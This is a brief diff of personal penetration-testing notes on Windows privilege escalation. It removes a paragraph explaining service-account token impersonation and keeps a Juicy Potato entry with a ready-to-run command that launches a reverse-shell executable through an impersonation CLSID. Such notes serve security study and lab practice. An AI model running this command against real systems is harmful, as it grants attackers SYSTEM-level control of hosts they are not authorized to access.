vipertooth/Notes/Windows/Priv Esc/Windows PrivEsc.md

 Potato.exe
 ```

-## Token Impersonation
-Service accounts can be given special privileges in order for them to run their services, and cannot be logged into directly.
-Unfortunately, multiple problems have been found with service accounts, making them easier to escalate privileges with.

- "SeImpersonatePrivilege/SeAssignPrimaryToken" privilege needed to be enabled.

 ### Juicy Potato
 Source code can be found at `https://github.com/ohpe/juicy-potato`
 > C:\PrivEsc\JuicyPotato.exe -l 1337 -p C:\PrivEsc\reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}